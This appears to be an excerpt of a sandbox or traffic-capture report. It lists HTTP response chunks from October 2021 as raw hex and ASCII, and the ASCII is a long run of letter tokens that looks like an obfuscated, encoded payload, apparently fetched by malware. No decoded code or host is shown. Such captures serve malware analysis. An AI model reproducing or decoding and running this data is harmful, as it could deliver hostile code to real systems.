                                                            2021-10-29 18:10:44 UTC1410INData Raw: 72 20 56 72 57 20 4e 4e 63 20 4e 4d 72 20 56 43 57 20 59 43 20 72 49 20 59 43 20 59 72 20 56 4e 43 20 4e 56 56 20 4e 4d 59 20 4e 43 4d 20 57 63 20 59 43 20 4e 49 4d 20 59 4e 20 56 59 43 20 56 72 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 49 43 20 59 63 20 4e 4c 59 20 63 56 20 56 56 57 20 4e 43 43 20 56 72 57 20 4e 43 49 20 4e 63 72 20 4e 72 4d 20 72 49 20 59 43 20 59 72 20 49 72 20 56 72 72 20 4e 56 59 20 56 43 49 20 4e 56 43 20 4e 4c 4d 20 4c 49 20 4e 57 43 20 59 59 20 4e 4c 4d 20 56 4e 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 49 56 20 59 49 20 4e 43 20 57 59 20 4e 49 43 20 57 57 20 56 56 72 20 4e 4e 4c 20 56 4e 59 20 4e 72 59 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 72 4c 20 4e 43 4e 20 59 56 20 59 4d 20 56 56 72 20 4c 63
                                                            Data Ascii: r VrW NNc NMr VCW YC rI YC Yr VNC NVV NMY NCM Wc YC NIM YN VYC VrY NNr NNM NCW NNV NIC Yc NLY cV VVW NCC VrW NCI Ncr NrM rI YC Yr Ir Vrr NVY VCI NVC NLM LI NWC YY NLM VNN NNM NCW NNV YC NIV YI NC WY NIC WW VVr NNL VNY NrY YC Yr Ir NNr VrL NCN YV YM VVr Lc
                                                            2021-10-29 18:10:44 UTC1413INData Raw: 49 4e 20 56 4e 4d 20 4e 4e 63 20 56 56 4e 20 56 4e 4c 20 59 43 20 72 49 20 59 43 20 59 72 20 56 4e 43 20 4e 56 56 20 4e 49 49 20 4e 56 72 20 4e 43 4d 20 59 43 20 4e 59 63 20 59 4e 20 4e 72 56 20 56 72 4e 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 49 43 20 59 63 20 56 56 4d 20 4c 57 20 56 57 20 4e 4e 57 20 56 4e 4d 20 4e 43 49 20 4e 4d 4d 20 4e 59 4e 20 72 49 20 59 43 20 59 72 20 49 72 20 56 72 72 20 4e 56 59 20 4e 4e 59 20 4e 4e 56 20 4e 4d 4c 20 4c 4d 20 4e 59 57 20 59 59 20 4e 59 4d 20 56 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 49 56 20 59 49 20 4e 4d 20 49 72 20 56 4e 4c 20 57 63 20 4e 57 56 20 4e 4e 4c 20 56 56 72 20 4e 72 57 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 72 4c 20 4e 43 4e 20 4e 43 63 20 72 57 20 4e 4d 59 20
                                                            Data Ascii: IN VNM NNc VVN VNL YC rI YC Yr VNC NVV NII NVr NCM YC NYc YN NrV VrN NNr NNM NCW NNV NIC Yc VVM LW VW NNW VNM NCI NMM NYN rI YC Yr Ir Vrr NVY NNY NNV NML LM NYW YY NYM VNY NNM NCW NNV YC NIV YI NM Ir VNL Wc NWV NNL VVr NrW YC Yr Ir NNr VrL NCN NCc rW NMY
                                                            2021-10-29 18:10:44 UTC1418INData Raw: 59 4e 20 72 49 20 56 56 59 20 59 59 20 4d 49 20 56 4e 57 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 49 56 20 59 49 20 4e 4c 57 20 57 56 20 57 49 20 4e 4e 4d 20 4e 57 43 20 4e 4e 4c 20 4e 4d 20 4e 59 4c 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 72 4c 20 4e 43 4e 20 4d 63 20 59 4d 20 56 72 57 20 59 43 20 56 56 63 20 49 59 20 49 57 20 56 56 43 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 4e 49 43 20 63 56 20 4e 63 20 4e 56 4e 20 4e 43 4e 20 4e 43 57 20 4e 63 72 20 59 4e 20 72 20 4e 59 59 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 56 4c 59 20 4e 56 43 20 56 4c 59 20 63 43 20 56 59 4e 20 59 72 20 4e 56 57 20 4e 4e 59 20 4d 4c 20 4e 57 63 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 4e 4d 63 20 57 56 20 4e 72 4d 20 4e 56 4e 20 4e 56 59 20 4e 4e 56 20
                                                            Data Ascii: YN rI VVY YY MI VNW NNM NCW NNV YC NIV YI NLW WV WI NNM NWC NNL NM NYL YC Yr Ir NNr VrL NCN Mc YM VrW YC VVc IY IW VVC NCW NNV YC rI NIC cV Nc NVN NCN NCW Ncr YN r NYY Yr Ir NNr NNM VLY NVC VLY cC VYN Yr NVW NNY ML NWc NNV YC rI YC NMc WV NrM NVN NVY NNV
                                                            2021-10-29 18:10:44 UTC1422INData Raw: 4e 57 59 20 4e 43 72 20 4e 43 49 20 59 43 20 4d 59 20 4e 59 4d 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 56 72 4c 20 59 43 20 57 49 20 72 49 20 56 56 4e 20 63 4d 20 72 59 20 4e 4e 57 20 56 4c 63 20 56 4e 57 20 59 43 20 72 49 20 59 43 20 59 72 20 56 4e 43 20 4e 43 63 20 56 59 59 20 49 57 20 4e 4e 4d 20 59 43 20 49 43 20 72 49 20 4e 59 43 20 56 59 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 56 4e 4e 20 72 57 20 4e 4c 63 20 56 4e 20 49 59 20 4e 4e 72 20 56 43 20 4e 4e 4e 20 56 4e 56 20 4e 59 4c 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 72 4d 20 4e 4e 63 20 4e 63 59 20 72 49 20 72 4e 20 72 49 20 49 4c 20 59 56 20 72 20 56 56 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 56 43 57 20 59 57 20 4c 4c 20 4e 43 4d 20 56 43 4c 20 4e 43 57 20 4e
                                                            Data Ascii: NWY NCr NCI YC MY NYM Ir NNr NNM NCW VrL YC WI rI VVN cM rY NNW VLc VNW YC rI YC Yr VNC NCc VYY IW NNM YC IC rI NYC VYY NNr NNM NCW NNV VNN rW NLc VN IY NNr VC NNN VNV NYL rI YC Yr Ir NrM NNc NcY rI rN rI IL YV r VVL NNM NCW NNV YC VCW YW LL NCM VCL NCW N
                                                            2021-10-29 18:10:44 UTC1426INData Raw: 20 4e 59 59 20 4e 43 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4d 63 20 4d 49 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 57 20 57 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 59 59 20 4e 43 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4d 63 20 4d 49 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 57 20 57 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 59 59 20 4e 43 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4d 63 20 4d 49 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 57 20 57 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 59 59 20 4e 43 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4d 63 20 4d 49 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 57 20 57 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 59 59 20 4e 43 20 59 72 20 49 72 20 4e
                                                            Data Ascii: NYY NC Yr Ir NNL NNM Mc MI YC rI YN Yr rW WL NNM NCW NNr YC NYY NC Yr Ir NNL NNM Mc MI YC rI YN Yr rW WL NNM NCW NNr YC NYY NC Yr Ir NNL NNM Mc MI YC rI YN Yr rW WL NNM NCW NNr YC NYY NC Yr Ir NNL NNM Mc MI YC rI YN Yr rW WL NNM NCW NNr YC NYY NC Yr Ir N
                                                            2021-10-29 18:10:44 UTC1430INData Raw: 20 72 49 20 59 4e 20 59 72 20 56 59 4e 20 57 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 4e 59 57 20 56 4d 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 4e 57 72 20 49 57 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 20 49 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 57 63 20 56 4e 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 63 4e 20 49 4d 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 20 49 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 57 63 20 56 4e 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 59 4c 20 49 57 20 59 43 20 72 49 20 72 49 20 59 72 20 56 4e 57 20 57 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 57 63 20 56 4e 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 63 4e 20 49 4d 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 20 49 59 20 4e 4e
                                                            Data Ascii: rI YN Yr VYN WN NNM NCW NNL YC NYW VM Yr Ir NNY NNM NWr IW YC rI YN Yr r IY NNM NCW NNL YC Wc VN Yr Ir NNY NNM cN IM YC rI YN Yr r IY NNM NCW NNL YC Wc VN Yr Ir NNY NNM YL IW YC rI rI Yr VNW WN NNM NCW NNL YC Wc VN Yr Ir NNY NNM cN IM YC rI YN Yr r IY NN
                                                            2021-10-29 18:10:44 UTC1434INData Raw: 4e 4e 4d 20 4e 59 20 59 72 20 49 72 20 4e 4e 56 20 4e 4e 4d 20 4e 56 56 20 4e 4e 43 20 59 43 20 72 49 20 59 4e 20 59 72 20 4e 43 4c 20 72 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 4c 20 4e 4e 56 20 59 72 20 49 72 20 4e 4e 56 20 4e 4e 4d 20 4e 49 49 20 57 43 20 59 43 20 72 49 20 72 57 20 59 72 20 4e 4d 20 4d 57 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 4e 4d 20 4e 56 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 72 43 20 4d 4d 20 59 43 20 72 49 20 72 49 20 59 72 20 63 4d 20 4e 43 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 4c 20 4e 4e 56 20 59 72 20 49 72 20 4e 4e 56 20 4e 4e 4d 20 4e 57 4d 20 72 49 20 59 43 20 72 49 20 72 57 20 59 72 20 56 72 72 20 59 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 59 43 20 4e 56 72 20 56 20 59 72 20 49 72
                                                            Data Ascii: NNM NY Yr Ir NNV NNM NVV NNC YC rI YN Yr NCL rI NNM NCW NNL YC L NNV Yr Ir NNV NNM NII WC YC rI rW Yr NM MW NNM NCW NNL YC NM NV Yr Ir NNY NNM rC MM YC rI rI Yr cM NCI NNM NCW NNL YC L NNV Yr Ir NNV NNM NWM rI YC rI rW Yr Vrr YC NNM NCW NNc YC NVr V Yr Ir
                                                            2021-10-29 18:10:44 UTC1438INData Raw: 20 63 49 20 4e 4c 59 20 4e 4e 63 20 59 4e 20 59 56 20 63 72 20 57 20 4e 63 4d 20 4e 4e 49 20 4e 4e 63 20 4e 43 59 20 4e 4e 4d 20 57 20 56 43 4e 20 59 72 20 63 4c 20 49 43 20 4c 4c 20 4e 4e 43 20 4e 72 63 20 4e 4e 63 20 56 4c 49 20 72 49 20 4e 49 72 20 56 20 49 59 20 4e 4e 72 20 4e 43 43 20 4e 43 59 20 4e 72 43 20 56 4e 20 72 43 20 59 59 20 56 4c 20 49 43 20 4e 57 49 20 49 63 20 4e 43 49 20 4e 4e 56 20 4e 57 20 59 56 20 72 4c 20 4e 4e 49 20 49 59 20 4e 4e 72 20 4e 4e 63 20 4e 43 49 20 4e 49 57 20 4e 4d 20 72 57 20 59 43 20 72 4d 20 49 59 20 56 72 49 20 63 59 20 56 59 20 4e 4e 56 20 56 4d 20 59 56 20 4e 49 72 20 56 20 56 56 20 4e 4e 57 20 57 56 20 4e 43 59 20 4e 72 4e 20 72 4d 20 4e 56 4e 20 59 59 20 4c 4e 20 49 43 20 4e 56 4e 20 59 4c 20 4e 43 49 20 4e 4e
                                                            Data Ascii: cI NLY NNc YN YV cr W NcM NNI NNc NCY NNM W VCN Yr cL IC LL NNC Nrc NNc VLI rI NIr V IY NNr NCC NCY NrC VN rC YY VL IC NWI Ic NCI NNV NW YV rL NNI IY NNr NNc NCI NIW NM rW YC rM IY VrI cY VY NNV VM YV NIr V VV NNW WV NCY NrN rM NVN YY LN IC NVN YL NCI NN
                                                            2021-10-29 18:10:44 UTC1442INData Raw: 56 43 20 4e 4e 72 20 4e 4d 63 20 63 4c 20 4e 56 4d 20 49 63 20 56 59 43 20 59 4c 20 56 4c 4d 20 4e 56 59 20 4e 56 4c 20 59 43 20 4d 4e 20 4e 4e 49 20 56 4e 56 20 4e 56 4d 20 63 43 20 4e 4e 4e 20 4c 63 20 4e 4e 72 20 4e 4d 63 20 63 4c 20 4e 43 4c 20 49 4e 20 56 4e 4d 20 4e 43 63 20 56 4c 72 20 4e 56 59 20 57 4e 20 59 4c 20 4e 49 72 20 56 20 49 59 20 4e 4e 72 20 56 49 20 4e 43 72 20 4d 72 20 56 72 20 59 4c 20 59 43 20 57 59 20 49 4e 20 4e 4e 43 20 57 59 20 4e 43 72 20 4e 4e 56 20 57 4e 20 59 4c 20 56 63 20 72 59 20 49 4e 20 4e 4e 72 20 56 49 20 4e 43 72 20 56 4e 4e 20 4e 4c 20 59 4c 20 59 43 20 57 59 20 49 4e 20 4e 72 57 20 57 56 20 4e 43 72 20 4e 4e 56 20 57 57 20 59 4c 20 4e 57 57 20 56 20 56 4e 49 20 4e 56 4d 20 72 20 4e 43 72 20 56 59 43 20 63 20 72 57
                                                            Data Ascii: VC NNr NMc cL NVM Ic VYC YL VLM NVY NVL YC MN NNI VNV NVM cC NNN Lc NNr NMc cL NCL IN VNM NCc VLr NVY WN YL NIr V IY NNr VI NCr Mr Vr YL YC WY IN NNC WY NCr NNV WN YL Vc rY IN NNr VI NCr VNN NL YL YC WY IN NrW WV NCr NNV WW YL NWW V VNI NVM r NCr VYC c rW
                                                            2021-10-29 18:10:44 UTC1445INData Raw: 59 4c 20 4e 72 59 20 59 72 20 4d 63 20 4e 4e 43 20 4e 56 72 20 4e 43 72 20 4e 57 59 20 59 43 20 4e 4e 43 20 72 43 20 4c 4e 20 49 4e 20 4e 57 4c 20 4e 4e 4d 20 4c 20 4e 43 63 20 4e 4e 59 20 59 4c 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 59 72 20 4e 43 72 20 56 4e 4e 20 59 43 20 4e 4e 56 20 72 63 20 4e 56 4d 20 49 4e 20 4e 57 4c 20 4e 4e 4d 20 4e 57 20 4e 43 63 20 49 4c 20 59 4c 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 56 49 20 4e 43 72 20 4e 57 59 20 59 43 20 4e 57 43 20 72 43 20 4e 49 4c 20 49 4e 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 4d 4d 20 59 4c 20 4e 72 59 20 59 72 20 63 43 20 4e 4e 43 20 56 59 56 20 4e 43 72 20 4e 57 59 20 59 43 20 4e 4d 72 20 72 43 20 4e 59 4e 20 49 4e 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 72
                                                            Data Ascii: YL NrY Yr Mc NNC NVr NCr NWY YC NNC rC LN IN NWL NNM L NCc NNY YL NNL Yr NcV NVY Yr NCr VNN YC NNV rc NVM IN NWL NNM NW NCc IL YL NNL Yr NcV NVY VI NCr NWY YC NWC rC NIL IN rW NNM NYY NVM NMM YL NrY Yr cC NNC VYV NCr NWY YC NMr rC NYN IN rW NNM NYY NVM Nr
                                                            2021-10-29 18:10:44 UTC1450INData Raw: 63 56 20 4e 56 59 20 56 72 59 20 4e 4e 63 20 4e 56 4c 20 59 43 20 4e 57 49 20 63 4e 20 56 72 63 20 4d 4d 20 4e 56 4e 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 56 4e 43 20 72 4e 20 59 4d 20 59 72 20 4e 63 56 20 4e 56 59 20 4e 72 57 20 4e 4e 4c 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 4e 59 43 20 4d 4c 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 56 72 56 20 72 59 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 4e 72 57 20 4e 4e 56 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 59 72 20 4d 72 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 49 20 72 63 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 59 4c 20 4e 4e 59 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 49 63 20 4d 72 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 4d 49 20 72 63 20 4e 4e 4c 20 59 72
                                                            Data Ascii: cV NVY VrY NNc NVL YC NWI cN Vrc MM NVN NNM NYY NVM VNC rN YM Yr NcV NVY NrW NNL YN YC NWI cN NYC ML rW NNM NYY NVM VrV rY NNL Yr NcV NVY NrW NNV YN YC NWI cN Yr Mr rW NNM NYY NVM NI rc NNL Yr NcV NVY YL NNY YN YC NWI cN Ic Mr rW NNM NYY NVM NMI rc NNL Yr
                                                            2021-10-29 18:10:44 UTC1454INData Raw: 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 4d 49 20 49 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 56 4e 4c 20 49 59 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 56 72 63 20 4e 43 49 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 56 4e 43 20 49 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 4e 4e 4d 20 49 72 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 56 56 20 4e 43 57 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 4e 72 20 57 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 56 4e 20 49 72 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 4e 49 56 20 4e 43 57 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 72 63 20 57 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 4e 49 4e 20 49 72 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 56 4e 72 20 4e 43 57 20
                                                            Data Ascii: rW NNM NYY NVM NMI I NNL Yr NcV NVY VNL IY YN YC NWI cN Vrc NCI rW NNM NYY NVM VNC I NNL Yr NcV NVY NNM Ir YN YC NWI cN VV NCW rW NNM NYY NVM NNr W NNL Yr NcV NVY VN Ir YN YC NWI cN NIV NCW rW NNM NYY NVM Nrc W NNL Yr NcV NVY NIN Ir YN YC NWI cN VNr NCW
                                                            2021-10-29 18:10:44 UTC1458INData Raw: 20 56 4e 59 20 63 43 20 4e 4d 20 72 4d 20 49 72 20 4e 4e 72 20 59 43 20 57 57 20 49 4c 20 72 4c 20 72 49 20 59 43 20 4e 4e 4c 20 57 4e 20 56 56 4e 20 4e 43 49 20 4e 43 57 20 4e 4e 56 20 4e 43 4d 20 4c 4c 20 4e 4d 20 72 4d 20 49 72 20 4e 4e 72 20 4e 63 43 20 4e 56 72 20 49 4c 20 72 4c 20 72 49 20 59 43 20 56 57 20 49 72 20 49 4e 20 4e 43 49 20 4e 43 57 20 4e 4e 56 20 56 4e 20 59 4e 20 4e 4d 20 72 4d 20 49 72 20 4e 4e 72 20 4e 63 43 20 4e 43 59 20 56 4e 56 20 72 4c 20 72 49 20 59 43 20 4e 59 20 49 4c 20 49 4e 20 4e 43 49 20 4e 43 57 20 4e 4e 56 20 43 20 59 4d 20 4e 4d 20 72 4d 20 49 72 20 4e 4e 72 20 4e 72 63 20 4e 43 56 20 49 4d 20 72 4c 20 72 49 20 59 43 20 56 56 72 20 4e 43 4d 20 4e 57 57 20 4e 43 49 20 4e 43 57 20 4e 4e 56 20 4e 63 4c 20 4e 4e 72 20 4e
                                                            Data Ascii: VNY cC NM rM Ir NNr YC WW IL rL rI YC NNL WN VVN NCI NCW NNV NCM LL NM rM Ir NNr NcC NVr IL rL rI YC VW Ir IN NCI NCW NNV VN YN NM rM Ir NNr NcC NCY VNV rL rI YC NY IL IN NCI NCW NNV C YM NM rM Ir NNr Nrc NCV IM rL rI YC VVr NCM NWW NCI NCW NNV NcL NNr N
                                                            2021-10-29 18:10:44 UTC1462INData Raw: 4e 72 20 4e 63 72 20 4e 43 49 20 4e 49 4e 20 59 43 20 72 57 20 59 43 20 56 56 49 20 49 59 20 4e 49 4c 20 4e 4e 4d 20 4e 4e 4e 20 4e 4e 56 20 63 4e 20 59 43 20 56 72 59 20 59 72 20 49 63 20 4e 4e 72 20 4e 43 43 20 4e 4e 4e 20 4e 49 59 20 59 43 20 59 72 20 59 43 20 4c 43 20 49 72 20 57 4d 20 4e 4e 4d 20 59 57 20 4e 4e 56 20 72 43 20 59 56 20 4c 4d 20 59 72 20 56 20 4e 4e 72 20 4e 43 59 20 4e 43 59 20 4e 43 59 20 59 43 20 4e 43 56 20 59 43 20 72 43 20 49 43 20 4e 43 59 20 4e 4e 4d 20 59 57 20 4e 4e 56 20 4e 49 20 59 56 20 72 4d 20 59 72 20 56 20 4e 4e 72 20 49 4d 20 4e 43 59 20 4e 4e 4e 20 59 43 20 4e 43 56 20 59 43 20 4e 49 20 49 43 20 49 4c 20 4e 4e 4d 20 59 57 20 4e 4e 56 20 56 43 20 59 56 20 4e 4d 20 59 72 20 4e 59 59 20 49 57 20 4e 4d 56 20 4d 43 20 4e
                                                            Data Ascii: Nr Ncr NCI NIN YC rW YC VVI IY NIL NNM NNN NNV cN YC VrY Yr Ic NNr NCC NNN NIY YC Yr YC LC Ir WM NNM YW NNV rC YV LM Yr V NNr NCY NCY NCY YC NCV YC rC IC NCY NNM YW NNV NI YV rM Yr V NNr IM NCY NNN YC NCV YC NI IC IL NNM YW NNV VC YV NM Yr NYY IW NMV MC N
                                                            2021-10-29 18:10:44 UTC1466INData Raw: 59 72 20 4e 4d 20 4e 4e 72 20 4e 57 20 4e 43 57 20 59 4c 20 59 43 20 49 4d 20 59 43 20 4e 4e 59 20 49 72 20 56 63 20 4e 4e 4d 20 72 43 20 4e 4e 56 20 57 4e 20 72 49 20 4e 4e 57 20 59 72 20 63 56 20 4e 4e 72 20 72 49 20 4e 43 57 20 56 4d 20 59 43 20 4e 4e 4d 20 59 43 20 57 43 20 49 72 20 59 59 20 4e 4e 4d 20 43 20 4e 4e 56 20 4e 4e 57 20 72 49 20 57 56 20 59 72 20 4e 4d 20 4e 4e 72 20 56 63 20 4e 43 57 20 59 4c 20 59 43 20 63 72 20 59 43 20 4e 4e 59 20 49 72 20 4c 20 4e 4e 4d 20 72 43 20 4e 4e 56 20 63 72 20 72 49 20 4e 4e 57 20 59 72 20 4c 57 20 4e 4e 72 20 72 49 20 4e 43 57 20 72 20 59 43 20 4e 4e 4d 20 59 43 20 63 4d 20 49 72 20 59 59 20 4e 4e 4d 20 56 4d 20 4e 4e 56 20 4e 4e 57 20 72 49 20 63 57 20 59 72 20 4e 4d 20 4e 4e 72 20 4e 4c 20 4e 43 57 20 59
                                                            Data Ascii: Yr NM NNr NW NCW YL YC IM YC NNY Ir Vc NNM rC NNV WN rI NNW Yr cV NNr rI NCW VM YC NNM YC WC Ir YY NNM C NNV NNW rI WV Yr NM NNr Vc NCW YL YC cr YC NNY Ir L NNM rC NNV cr rI NNW Yr LW NNr rI NCW r YC NNM YC cM Ir YY NNM VM NNV NNW rI cW Yr NM NNr NL NCW Y
                                                            2021-10-29 18:10:44 UTC1477INData Raw: 20 49 59 20 4d 43 20 4e 43 59 20 56 57 20 56 56 20 63 49 20 57 4e 20 4e 4e 56 20 63 59 20 49 59 20 4d 43 20 4e 43 59 20 56 57 20 56 56 20 63 49 20 57 4e 20 4e 4e 56 20 4e 4e 57 20 57 72 20 4d 43 20 57 59 20 4c 56 20 4e 4e 20 63 49 20 57 4e 20 4e 4e 56 20 63 20 4e 20 56 20 4e 4e 72 20 57 4d 20 4d 4e 20 63 49 20 72 4d 20 59 72 20 4e 4e 20 4e 4e 63 20 4e 4e 4c 20 4d 20 4e 49 20 63 63 20 59 72 20 72 4c 20 63 63 20 72 20 56 20 4e 4e 57 20 56 20 4e 63 20 72 49 20 63 49 20 57 4c 20 4d 4e 20 59 20 4d 20 4e 4e 20 4c 20 4e 63 20 4d 4e 20 63 4d 20 72 43 20 59 4c 20 4e 4e 4c 20 43 20 43 20 43 20 49 72 20 59 59 20 63 57 20 72 63 20 59 4c 20 4e 4e 56 20 4c 20 4e 4e 57 20 56 20 57 49 20 59 59 20 4d 4d 20 49 49 20 4d 4e 20 4e 4e 59 20 4d 20 56 20 4e 4e 4d 20 4e 49 20 72
                                                            Data Ascii: IY MC NCY VW VV cI WN NNV cY IY MC NCY VW VV cI WN NNV NNW Wr MC WY LV NN cI WN NNV c N V NNr WM MN cI rM Yr NN NNc NNL M NI cc Yr rL cc r V NNW V Nc rI cI WL MN Y M NN L Nc MN cM rC YL NNL C C C Ir YY cW rc YL NNV L NNW V WI YY MM II MN NNY M V NNM NI r
                                                            2021-10-29 18:10:44 UTC1482INData Raw: 57 20 4d 4e 20 49 49 20 59 43 20 4e 4e 63 20 4e 4e 4c 20 4e 4e 63 20 4e 4e 56 20 56 4e 20 4d 43 20 4d 63 20 57 43 20 4d 43 20 4e 4e 57 20 57 20 4e 4e 4c 20 4e 4e 72 20 4e 43 4e 20 59 59 20 4d 43 20 49 59 20 72 57 20 4e 4e 59 20 4e 4e 63 20 4e 4e 63 20 56 20 57 49 20 63 59 20 59 59 20 4e 43 57 20 4d 4c 20 4e 4e 49 20 57 20 4e 4e 59 20 4e 4e 56 20 4e 43 4c 20 59 4e 20 72 49 20 57 56 20 63 59 20 4e 4e 59 20 59 20 4e 43 20 4e 4e 72 20 57 4d 20 4d 4e 20 72 49 20 72 4d 20 4d 56 20 4e 4e 59 20 63 20 4e 4e 59 20 4e 4e 59 20 56 4c 20 4d 72 20 59 4e 20 57 4c 20 63 4d 20 4e 4e 63 20 4d 20 4e 4e 59 20 4e 4e 72 20 4e 43 43 20 63 4d 20 72 49 20 49 59 20 4d 4c 20 4e 4e 20 72 20 4e 4e 56 20 59 72 20 57 4d 20 72 49 20 59 59 20 57 72 20 4d 4e 20 4e 43 20 49 20 4e 4e 59 20
                                                            Data Ascii: W MN II YC NNc NNL NNc NNV VN MC Mc WC MC NNW W NNL NNr NCN YY MC IY rW NNY NNc NNc V WI cY YY NCW ML NNI W NNY NNV NCL YN rI WV cY NNY Y NC NNr WM MN rI rM MV NNY c NNY NNY VL Mr YN WL cM NNc M NNY NNr NCC cM rI IY ML NN r NNV Yr WM rI YY Wr MN NC I NNY
                                                            2021-10-29 18:10:44 UTC1498INData Raw: 4e 72 20 63 20 4e 72 20 4e 4d 20 57 56 20 57 72 20 49 4d 20 63 49 20 56 4e 20 43 20 4e 49 20 4e 43 57 20 4c 59 20 49 4d 20 49 4e 20 63 72 20 49 59 20 63 43 20 4e 4e 72 20 59 63 20 4e 56 20 72 20 49 4e 20 49 49 20 59 43 20 4e 4e 4c 20 72 57 20 63 20 59 63 20 57 20 63 57 20 4e 56 56 20 49 4e 20 63 59 20 57 72 20 49 72 20 72 57 20 56 63 20 43 20 43 20 4d 4e 20 63 49 20 49 4d 20 4e 56 63 20 59 4c 20 4e 20 56 57 20 4e 43 57 20 63 4e 20 49 4c 20 63 49 20 57 43 20 59 72 20 4c 63 20 43 20 56 63 20 4e 4e 20 56 59 20 57 72 20 49 59 20 57 49 20 49 4d 20 4c 56 20 56 63 20 4e 4e 4d 20 72 56 20 56 4e 20 4d 43 20 4e 4e 49 20 57 4c 20 57 43 20 72 49 20 56 4c 20 4d 20 63 4e 20 4e 4d 20 4d 43 20 49 49 20 59 43 20 63 49 20 59 57 20 56 57 20 4e 20 63 4e 20 4e 4d 20 4d 43 20
                                                            Data Ascii: Nr c Nr NM WV Wr IM cI VN C NI NCW LY IM IN cr IY cC NNr Yc NV r IN II YC NNL rW c Yc W cW NVV IN cY Wr Ir rW Vc C C MN cI IM NVc YL N VW NCW cN IL cI WC Yr Lc C Vc NN VY Wr IY WI IM LV Vc NNM rV VN MC NNI WL WC rI VL M cN NM MC II YC cI YW VW N cN NM MC
